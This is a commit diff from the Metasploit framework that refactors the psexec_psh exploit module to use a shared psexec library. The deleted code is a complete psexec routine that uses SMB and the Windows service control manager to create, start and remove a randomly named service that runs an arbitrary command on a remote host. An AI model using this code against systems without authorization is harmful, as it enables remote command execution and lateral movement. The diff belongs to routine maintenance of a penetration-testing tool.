Refactor to psexec lib

Author: Meatballs1

modules/exploits/windows/smb/psexec_psh.rb

@@ -14,18 +14,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		Rank = ManualRanking
 
 	# Exploit mixins should be called first
-	include Msf::Exploit::Remote::DCERPC
-	include Msf::Exploit::Remote::SMB
-	include Msf::Exploit::Remote::SMB::Authenticated
+	include Msf::Exploit::Remote::SMB::Psexec
 	include Msf::Exploit::Powershell
 	include Msf::Auxiliary::Report
 	include Msf::Exploit::EXE
 
-	# Aliases for common classes
-	SIMPLE = Rex::Proto::SMB::SimpleClient
-	XCEPT  = Rex::Proto::SMB::Exceptions
-	CONST  = Rex::Proto::SMB::Constants
-
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'           => 'Microsoft Windows Authenticated Powershell Command Execution',
@@ -112,127 +105,6 @@ def exploit
 		end
 	end
 
-	# This code was stolen straight out of psexec.rb.  Thanks very much HDM and all who contributed to that module!!
-	# Instead of uploading and runing a binary.  This method runs a single windows command fed into the COMMAND paramater
-	def psexec(command)
-
-		simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
-
-		handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
-		vprint_status("#{peer} - Binding to #{handle} ...")
-		dcerpc_bind(handle)
-		vprint_status("#{peer} - Bound to #{handle} ...")
-
-		vprint_status("#{peer} - Obtaining a service manager handle...")
-		scm_handle = nil
-		stubdata =
-			NDR.uwstring("\\\\#{rhost}") +
-			NDR.long(0) +
-			NDR.long(0xF003F)
-		begin
-			response = dcerpc.call(0x0f, stubdata)
-			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-				scm_handle = dcerpc.last_response.stub_data[0,20]
-			end
-		rescue ::Exception => e
-			print_error("#{peer} - Error: #{e}")
-			return false
-		end
-
-		servicename = Rex::Text.rand_text_alpha(11)
-		displayname = Rex::Text.rand_text_alpha(16)
-		holdhandle = scm_handle
-		svc_handle  = nil
-		svc_status  = nil
-
-		stubdata =
-			scm_handle +
-			NDR.wstring(servicename) +
-			NDR.uwstring(displayname) +
-
-			NDR.long(0x0F01FF) + # Access: MAX
-			NDR.long(0x00000110) + # Type: Interactive, Own process
-			NDR.long(0x00000003) + # Start: Demand
-			NDR.long(0x00000000) + # Errors: Ignore
-			NDR.wstring( command ) +
-			NDR.long(0) + # LoadOrderGroup
-			NDR.long(0) + # Dependencies
-			NDR.long(0) + # Service Start
-			NDR.long(0) + # Password
-			NDR.long(0) + # Password
-			NDR.long(0) + # Password
-			NDR.long(0)  # Password
-		begin
-			vprint_status("#{peer} - Creating the service...")
-			response = dcerpc.call(0x0c, stubdata)
-			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-				svc_handle = dcerpc.last_response.stub_data[0,20]
-				svc_status = dcerpc.last_response.stub_data[24,4]
-			end
-		rescue ::Exception => e
-			print_error("#{peer} - Error: #{e}")
-			return false
-		end
-
-		vprint_status("#{peer} - Closing service handle...")
-		begin
-			response = dcerpc.call(0x0, svc_handle)
-		rescue ::Exception
-		end
-
-		vprint_status("#{peer} - Opening service...")
-		begin
-			stubdata =
-				scm_handle +
-				NDR.wstring(servicename) +
-				NDR.long(0xF01FF)
-
-			response = dcerpc.call(0x10, stubdata)
-			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-				svc_handle = dcerpc.last_response.stub_data[0,20]
-			end
-		rescue ::Exception => e
-			print_error("#{peer} - Error: #{e}")
-			return false
-		end
-
-		vprint_status("#{peer} - Starting the service...")
-		stubdata =
-			svc_handle +
-			NDR.long(0) +
-			NDR.long(0)
-		begin
-			response = dcerpc.call(0x13, stubdata)
-			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-			end
-		rescue ::Exception => e
-			print_error("#{peer} - Error: #{e}")
-			return false
-		end
-
-		vprint_status("#{peer} - Removing the service...")
-		stubdata =
-			svc_handle
-		begin
-			response = dcerpc.call(0x02, stubdata)
-			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-			end
-		rescue ::Exception => e
-			print_error("#{peer} - Error: #{e}")
-		end
-
-		vprint_status("#{peer} - Closing service handle...")
-		begin
-			response = dcerpc.call(0x0, svc_handle)
-		rescue ::Exception => e
-			print_error("#{peer} - Error: #{e}")
-		end
-
-		select(nil, nil, nil, 1.0)
-		simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$")
-		return true
-	end
-
 	def peer
 		return "#{rhost}:#{rport}"
 	end